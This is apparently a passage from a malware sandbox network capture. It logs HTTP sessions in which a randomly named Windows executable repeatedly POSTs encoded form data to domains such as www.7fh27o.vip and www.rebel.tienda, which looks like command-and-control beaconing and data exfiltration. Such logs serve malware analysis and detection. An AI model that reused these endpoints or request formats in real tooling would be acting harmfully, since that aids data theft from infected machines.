38 33 36 69 39 68 77 4f 53 6d 44 64 78 70 55 72 56 73 33 57 6e 57 68 34 5a 47 67 78 6c 2b 38 6e 37 78 31 37 4d 6c 65 45 72 6e 37 34 43 6d 6f 31 6e 54 4c 37 54 70 32 6e 4e 64 4e 2b 42 71 7a 63 63 32 77 6b 54 77 6f 72 65 4a 35 42 50 49 36 78 68 54 73 50 79 52 6d 35 74 6a 35 45 72 43 43 42 2f 6a 62 54 4a 44 76 71 41 2f 36 51 4b 4b 76 4e 31 33 71 78 4f 75 78 6a 6e 59 4d 4e 37 67 33 5a 41 5a 76 43 47 72 57 51 64 4d 5a 4a 38 72 65 69 6c 4d 2f 58 72 35 44 69 56 2f 70 4d 4f 76 46 57 47 71 41 79 7a 58 46 7a [TRUNCATED] Data Ascii: nl=8FrukiibSUwXr71ucqeOUMhO/PGn/UpJ8Ssnki1W/QUSgFW9nM0Gia2v42bFlfes73vlL4Ke9NGSTFI7tmIJNwF7+sGHm+EIcahuiH6AeYk5SRhZX3ut+6zk18PO9exEqWu2CTbJEOG5MwqC+tpFQXujF7I/q9rk6u0kSG9836i9hwOSmDdxpUrVs3WnWh4ZGgxl+8n7x17MleErn74Cmo1nTL7Tp2nNdN+Bqzcc2wkTworeJ5BPI6xhTsPyRm5tj5ErCCB/jbTJDvqA/6QKKvN13qxOuxjnYMN7g3ZAZvCGrWQdMZJ8reilM/Xr5DiV/pMOvFWGqAyzXFztcNK50YqCXl6ziYY2ijIJHDzjbNz8heZTB8pLOwr8ezY10/vxgJBSQM1bdsltPCk1SjDwOfoBimQOFtPDPvus/L4vmM/kXTmuw8iYV62CeOEMAdUZ7+hrUGBfVuO/XEHu+7NY9+G8DLLquL6AyM53ag4UnF6yj1Wv9jCXzCcAZivvpcA736Mi31L9coFzskLg8GEeB4m5GilG3Ij9fzbtIi5eiGMvSZvx3AQ5xmUyuRBQpa7ioo8MGiHBsJGpLwYDYgkoYVmt++rEFGQ/B6E/yre86X400JEVquAc1F+hOR6UcFCNkF/+HKZ+6YoF9Yu/4q332fU2hia226h1rafC7W4ILFcX01Xy4ifdyDszi4zytkBz8mYQvWMdTLgWXIEcTLK1u4hAOpDarKR6c54WIOBhMeEJmFfd++s6Otxc+IJId0RcePD/K7jnFBJwXipNZBjWr/CJ71iHSEs6LeH//QUzzqnWdMyurZxsa497Bf4d+t4UEP0RLU0F/bNFGLUXKRlqZdWIWGXToM9flWA/woDyqDvLGLIsvT4FRjqYXcOZsnUhldnhTBEzoR6QXhVd6k1ScoAPRomYDLE9RaHLF+1xbSVlKDoiSZ1VH7UwIouN82bjKZCbpjJZ+YMFs8BFz4kNa73oNYgw1lGZkWAX2jCpmFK5kOr1A [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	50005	3.33.130.190	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:47:08.310547113 CET	465	OUT	GET /6o8s/?dbL=d8WX_v0PGVHXAtK&nl=xHDOnX+lWlIEr4hpJa7vJ+Ai0eztjiZ58G8B7DId8TM/qnePyNRX8+3i62aVr9vdoGnKMYHj9baJVFQ0pmQfJSNjzKPDt8hcfoZjjjTuXP86Dx4dRnWR0YG+vtOimu0PrA== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.wrl-llc.net User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Nov 1, 2024 03:47:08.939538002 CET	410	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 01 Nov 2024 02:47:08 GMT Content-Type: text/html Content-Length: 270 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 64 62 4c 3d 64 38 57 58 5f 76 30 50 47 56 48 58 41 74 4b 26 6e 6c 3d 78 48 44 4f 6e 58 2b 6c 57 6c 49 45 72 34 68 70 4a 61 37 76 4a 2b 41 69 30 65 7a 74 6a 69 5a 35 38 47 38 42 37 44 49 64 38 54 4d 2f 71 6e 65 50 79 4e 52 58 38 2b 33 69 36 32 61 56 72 39 76 64 6f 47 6e 4b 4d 59 48 6a 39 62 61 4a 56 46 51 30 70 6d 51 66 4a 53 4e 6a 7a 4b 50 44 74 38 68 63 66 6f 5a 6a 6a 6a 54 75 58 50 38 36 44 78 34 64 52 6e 57 52 30 59 47 2b 76 74 4f 69 6d 75 30 50 72 41 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?dbL=d8WX_v0PGVHXAtK&nl=xHDOnX+lWlIEr4hpJa7vJ+Ai0eztjiZ58G8B7DId8TM/qnePyNRX8+3i62aVr9vdoGnKMYHj9baJVFQ0pmQfJSNjzKPDt8hcfoZjjjTuXP86Dx4dRnWR0YG+vtOimu0PrA=="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50006	3.33.130.190	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:47:13.986392975 CET	708	OUT	POST /l5ty/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Connection: close Host: www.7fh27o.vip Origin: http://www.7fh27o.vip Referer: http://www.7fh27o.vip/l5ty/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 6e 38 6d 34 61 77 76 46 36 54 6d 78 59 7a 43 47 33 72 78 4a 47 66 36 36 66 77 4e 74 43 71 56 65 69 50 63 55 76 4b 57 48 51 2b 5a 4a 4c 2b 6a 69 77 37 54 50 4b 45 64 4d 47 74 7a 5a 51 68 74 53 44 47 33 54 36 57 49 46 68 64 7a 36 67 41 36 50 78 7a 4a 43 59 71 67 48 35 37 66 73 44 67 7a 77 59 4e 66 56 53 55 4c 32 7a 57 74 6b 34 78 52 79 69 78 78 52 63 42 59 50 35 43 4a 75 7a 68 4b 62 46 55 78 6e 76 42 34 48 4f 73 71 65 55 63 55 6a 52 71 64 61 76 38 4e 38 79 6c 79 2f 44 53 54 77 4f 72 36 55 6e 2b 2b 35 33 6c 5a 62 72 76 59 6b 55 6a 64 6e 57 4d 4e 38 33 78 54 6b 56 58 53 77 55 66 65 53 34 54 6f 3d Data Ascii: nl=n8m4awvF6TmxYzCG3rxJGf66fwNtCqVeiPcUvKWHQ+ZJL+jiw7TPKEdMGtzZQhtSDG3T6WIFhdz6gA6PxzJCYqgH57fsDgzwYNfVSUL2zWtk4xRyixxRcBYP5CJuzhKbFUxnvB4HOsqeUcUjRqdav8N8yly/DSTwOr6Un++53lZbrvYkUjdnWMN83xTkVXSwUfeS4To=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50007	3.33.130.190	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:47:16.538089991 CET	728	OUT	POST /l5ty/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Connection: close Host: www.7fh27o.vip Origin: http://www.7fh27o.vip Referer: http://www.7fh27o.vip/l5ty/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 6e 38 6d 34 61 77 76 46 36 54 6d 78 5a 54 79 47 6e 38 64 4a 48 2f 36 35 51 51 4e 74 5a 36 56 61 69 50 59 55 76 49 36 58 51 4d 39 4a 4f 72 66 69 78 35 72 50 4c 45 64 4d 4a 39 7a 59 50 78 73 51 44 47 7a 68 36 57 30 46 68 64 50 36 67 45 2b 50 77 46 42 4e 4a 71 67 4a 78 62 66 75 4e 41 7a 77 59 4e 66 56 53 55 50 4d 7a 57 46 6b 34 67 68 79 6b 67 78 51 43 78 59 4d 76 53 4a 75 67 78 4b 66 46 55 77 64 76 44 4d 35 4f 71 32 65 55 59 59 6a 52 37 64 64 36 73 4d 35 76 56 7a 6a 53 42 75 44 4f 72 2b 55 72 4e 50 59 30 6c 46 69 6e 35 70 4f 4f 42 56 50 46 73 68 45 6e 69 62 54 45 6e 7a 5a 4f 38 4f 69 6d 45 38 41 31 56 47 4b 74 35 54 46 34 64 65 38 55 71 51 69 62 57 34 33 Data Ascii: nl=n8m4awvF6TmxZTyGn8dJH/65QQNtZ6VaiPYUvI6XQM9JOrfix5rPLEdMJ9zYPxsQDGzh6W0FhdP6gE+PwFBNJqgJxbfuNAzwYNfVSUPMzWFk4ghykgxQCxYMvSJugxKfFUwdvDM5Oq2eUYYjR7dd6sM5vVzjSBuDOr+UrNPY0lFin5pOOBVPFshEnibTEnzZO8OimE8A1VGKt5TF4de8UqQibW43

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50008	3.33.130.190	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:47:19.082088947 CET	1745	OUT	POST /l5ty/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Cache-Control: no-cache Connection: close Host: www.7fh27o.vip Origin: http://www.7fh27o.vip Referer: http://www.7fh27o.vip/l5ty/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 6e 38 6d 34 61 77 76 46 36 54 6d 78 5a 54 79 47 6e 38 64 4a 48 2f 36 35 51 51 4e 74 5a 36 56 61 69 50 59 55 76 49 36 58 51 4d 31 4a 53 4a 6e 69 78 65 2f 50 49 45 64 4d 4b 39 7a 6a 50 78 73 52 44 47 4b 71 36 57 35 79 68 62 44 36 79 33 32 50 33 77 68 4e 51 36 67 4a 39 37 66 76 44 67 79 34 59 4e 50 76 53 55 2f 4d 7a 57 46 6b 34 69 35 79 79 42 78 51 41 78 59 50 35 43 4a 71 7a 68 4b 37 46 55 70 2f 76 44 4a 43 4f 63 47 65 58 38 30 6a 43 5a 31 64 6e 63 4d 33 73 56 7a 72 53 42 69 63 4f 72 79 69 72 4d 37 2b 30 6e 46 69 6b 2b 73 44 65 79 4e 77 59 63 5a 36 6c 6c 44 65 61 48 37 41 4e 61 47 6d 73 6b 41 30 70 32 72 6a 71 65 50 2f 2b 76 4c 53 47 65 63 49 63 52 31 58 76 42 65 59 62 34 5a 74 57 38 69 34 38 62 4b 56 79 6c 77 34 4c 49 30 2f 37 59 6b 59 7a 33 54 35 58 32 2b 30 54 59 6c 68 72 6f 75 48 55 6d 76 4e 4a 4c 66 65 55 72 54 4d 34 66 6f 6c 6a 4f 56 30 33 42 6d 2f 57 79 38 2b 46 46 75 63 79 51 7a 45 64 71 71 51 51 5a 68 65 31 47 6b 70 4e 34 61 71 65 4b 4d 2f 6f 74 2b 70 52 36 63 69 64 59 72 77 52 48 34 [TRUNCATED] Data Ascii: nl=n8m4awvF6TmxZTyGn8dJH/65QQNtZ6VaiPYUvI6XQM1JSJnixe/PIEdMK9zjPxsRDGKq6W5yhbD6y32P3whNQ6gJ97fvDgy4YNPvSU/MzWFk4i5yyBxQAxYP5CJqzhK7FUp/vDJCOcGeX80jCZ1dncM3sVzrSBicOryirM7+0nFik+sDeyNwYcZ6llDeaH7ANaGmskA0p2rjqeP/+vLSGecIcR1XvBeYb4ZtW8i48bKVylw4LI0/7YkYz3T5X2+0TYlhrouHUmvNJLfeUrTM4foljOV03Bm/Wy8+FFucyQzEdqqQQZhe1GkpN4aqeKM/ot+pR6cidYrwRH4wfpQA3yiIUVPUSbdoSp25+zN34jLkw+fteDrvEjJkqUhYPkAN1V0VgPJ6Z+OWMLGB20Ir3DRAYf9u6Sri++IBcBRSzyt7hpKKI7aq7QaDPKqp4x/v0kPl1g+zs1hhFdxbMqxH0kNanLruN4C/uOEy3bFYz0/atMRbS4sn9bYQs9oaEtfOOFT40WmGHfCCeaG697jsOB7zkoBKXix+1GEYbygRe7dcDrv7hmk+hyp0wtQvaFvixT6FkN7P2w35w+xmeI5tHMsV2Hb6mTKOmvEbzmlANh6/gQLplb9ZdzFjrc4341nNuaK7yVZ2L/VoircBmsn7/mXELDaQ7inkCFqAmQzArnRrdUl45KrzVwxbcQlp8W+pCisEaFzLQwTUGOhC/bcPvam6S7CyTvsrLyiuf/sQH6/yVqDyXyDs7RB4P4yVr++OVEgsmi8YEZ2QdqruAem4R54sYZparlyWr+UQEb4IsxuS1S1WnRFyt6sRfNjfdOYQhioUKmpHOXpxbtdqDSV/R7Fj7V70giqtpcLITU7zqm7eDZBLJq5MA5HHLpC2CCksHVe1P17Xy9MT1FE7aL/7x8VCZQV0Yf+w72IWGBKziatdvmKQJJJ/KoNRlNWvqmIR1InKHJVSVELLg4Uduhfv8tmAroLinzXnQ3f6bblAeYyfMmV9s [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50009	3.33.130.190	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:47:21.803534031 CET	464	OUT	GET /l5ty/?nl=q+OYZAje5TGGPxrh2f4udvzeWAEqGa5tlfgg+KmPc/5JdZ3+06LBf09NB5PeZCRMfA3Rwmt3pN3KnHXg/BNAYr426YnMJAy4Y/PCGFK03Rpxpi13xz0yDihesG1rii3hcQ==&dbL=d8WX_v0PGVHXAtK HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.7fh27o.vip User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Nov 1, 2024 03:47:22.456135988 CET	410	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 01 Nov 2024 02:47:22 GMT Content-Type: text/html Content-Length: 270 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 6c 3d 71 2b 4f 59 5a 41 6a 65 35 54 47 47 50 78 72 68 32 66 34 75 64 76 7a 65 57 41 45 71 47 61 35 74 6c 66 67 67 2b 4b 6d 50 63 2f 35 4a 64 5a 33 2b 30 36 4c 42 66 30 39 4e 42 35 50 65 5a 43 52 4d 66 41 33 52 77 6d 74 33 70 4e 33 4b 6e 48 58 67 2f 42 4e 41 59 72 34 32 36 59 6e 4d 4a 41 79 34 59 2f 50 43 47 46 4b 30 33 52 70 78 70 69 31 33 78 7a 30 79 44 69 68 65 73 47 31 72 69 69 33 68 63 51 3d 3d 26 64 62 4c 3d 64 38 57 58 5f 76 30 50 47 56 48 58 41 74 4b 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?nl=q+OYZAje5TGGPxrh2f4udvzeWAEqGa5tlfgg+KmPc/5JdZ3+06LBf09NB5PeZCRMfA3Rwmt3pN3KnHXg/BNAYr426YnMJAy4Y/PCGFK03Rpxpi13xz0yDihesG1rii3hcQ==&dbL=d8WX_v0PGVHXAtK"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50010	199.59.243.227	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:47:27.576492071 CET	714	OUT	POST /7n9v/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Connection: close Host: www.rebel.tienda Origin: http://www.rebel.tienda Referer: http://www.rebel.tienda/7n9v/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 30 4e 45 58 62 6a 7a 67 39 57 66 4d 59 77 68 53 72 2b 66 70 38 63 6a 73 4a 4d 64 39 65 50 74 65 69 31 4c 74 66 62 62 56 30 30 67 44 6e 62 76 63 57 45 68 50 7a 4a 78 33 49 43 76 46 5a 2f 51 5a 6c 5a 73 39 2f 52 32 35 70 50 5a 65 55 78 44 49 70 68 4c 66 50 46 74 78 32 34 78 77 2f 71 4b 4d 4d 36 46 2f 61 6f 4d 36 46 4d 46 32 4e 7a 46 44 6d 49 79 35 79 37 76 75 76 72 78 30 49 79 54 4f 6c 49 68 5a 50 50 74 77 43 6d 33 6e 79 31 71 31 57 51 51 55 4a 68 6f 51 34 74 65 72 36 54 7a 39 64 4c 79 4e 41 6b 50 58 36 75 6e 53 78 6c 76 4d 63 66 6c 6f 77 7a 74 56 74 76 74 4e 69 4f 66 45 43 4e 72 5a 2b 63 49 3d Data Ascii: nl=0NEXbjzg9WfMYwhSr+fp8cjsJMd9ePtei1LtfbbV00gDnbvcWEhPzJx3ICvFZ/QZlZs9/R25pPZeUxDIphLfPFtx24xw/qKMM6F/aoM6FMF2NzFDmIy5y7vuvrx0IyTOlIhZPPtwCm3ny1q1WQQUJhoQ4ter6Tz9dLyNAkPX6unSxlvMcflowztVtvtNiOfECNrZ+cI=
Nov 1, 2024 03:47:28.198755026 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 01 Nov 2024 02:47:27 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: ad35f7b3-bf71-4705-8c98-c77daddba0dd cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Jd7gfL8iXdCMqcwpa+Y/XABy2CxZRcw77JqVLNAliw+gtJsEHjy+6+FGCnsrABzA8MXqFcTfyB+zSRodgajpgQ== set-cookie: parking_session=ad35f7b3-bf71-4705-8c98-c77daddba0dd; expires=Fri, 01 Nov 2024 03:02:28 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4a 64 37 67 66 4c 38 69 58 64 43 4d 71 63 77 70 61 2b 59 2f 58 41 42 79 32 43 78 5a 52 63 77 37 37 4a 71 56 4c 4e 41 6c 69 77 2b 67 74 4a 73 45 48 6a 79 2b 36 2b 46 47 43 6e 73 72 41 42 7a 41 38 4d 58 71 46 63 54 66 79 42 2b 7a 53 52 6f 64 67 61 6a 70 67 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Jd7gfL8iXdCMqcwpa+Y/XABy2CxZRcw77JqVLNAliw+gtJsEHjy+6+FGCnsrABzA8MXqFcTfyB+zSRodgajpgQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 1, 2024 03:47:28.198919058 CET	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWQzNWY3YjMtYmY3MS00NzA1LThjOTgtYzc3ZGFkZGJhMGRkIiwicGFnZV90aW1lIjoxNzMwNDI5Mj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50011	199.59.243.227	80

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:47:30.128534079 CET	734	OUT	POST /7n9v/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Connection: close Host: www.rebel.tienda Origin: http://www.rebel.tienda Referer: http://www.rebel.tienda/7n9v/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 30 4e 45 58 62 6a 7a 67 39 57 66 4d 4a 68 52 53 70 64 33 70 2b 38 6a 76 44 73 64 39 46 2f 74 61 69 79 44 74 66 61 76 46 30 47 45 44 6e 36 66 63 58 46 68 50 79 4a 78 33 44 69 76 4b 58 66 51 43 6c 5a 70 49 2f 52 36 35 70 4c 78 65 55 77 7a 49 70 57 66 65 65 46 74 33 2b 59 78 2b 67 36 4b 4d 4d 36 46 2f 61 6f 5a 58 46 4d 4e 32 4e 43 56 44 6e 70 79 36 38 62 76 76 6f 72 78 30 46 53 54 4b 6c 49 68 6e 50 4e 4a 4b 43 67 7a 6e 79 30 61 31 57 43 34 58 63 78 6f 61 6c 39 66 6a 70 53 4f 36 54 5a 6d 6c 49 43 36 52 73 2f 48 39 35 7a 65 6d 47 39 74 41 6a 54 42 74 39 38 6c 36 7a 2b 2b 74 59 75 37 70 67 4c 64 44 30 57 2f 4d 67 58 73 69 43 77 48 38 72 56 73 66 4c 58 63 37 Data Ascii: nl=0NEXbjzg9WfMJhRSpd3p+8jvDsd9F/taiyDtfavF0GEDn6fcXFhPyJx3DivKXfQClZpI/R65pLxeUwzIpWfeeFt3+Yx+g6KMM6F/aoZXFMN2NCVDnpy68bvvorx0FSTKlIhnPNJKCgzny0a1WC4Xcxoal9fjpSO6TZmlIC6Rs/H95zemG9tAjTBt98l6z++tYu7pgLdD0W/MgXsiCwH8rVsfLXc7
Nov 1, 2024 03:47:30.743176937 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 01 Nov 2024 02:47:30 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: 97edab49-da11-43b7-a00e-b4ad31f8ccf9 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Jd7gfL8iXdCMqcwpa+Y/XABy2CxZRcw77JqVLNAliw+gtJsEHjy+6+FGCnsrABzA8MXqFcTfyB+zSRodgajpgQ== set-cookie: parking_session=97edab49-da11-43b7-a00e-b4ad31f8ccf9; expires=Fri, 01 Nov 2024 03:02:30 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4a 64 37 67 66 4c 38 69 58 64 43 4d 71 63 77 70 61 2b 59 2f 58 41 42 79 32 43 78 5a 52 63 77 37 37 4a 71 56 4c 4e 41 6c 69 77 2b 67 74 4a 73 45 48 6a 79 2b 36 2b 46 47 43 6e 73 72 41 42 7a 41 38 4d 58 71 46 63 54 66 79 42 2b 7a 53 52 6f 64 67 61 6a 70 67 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Jd7gfL8iXdCMqcwpa+Y/XABy2CxZRcw77JqVLNAliw+gtJsEHjy+6+FGCnsrABzA8MXqFcTfyB+zSRodgajpgQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
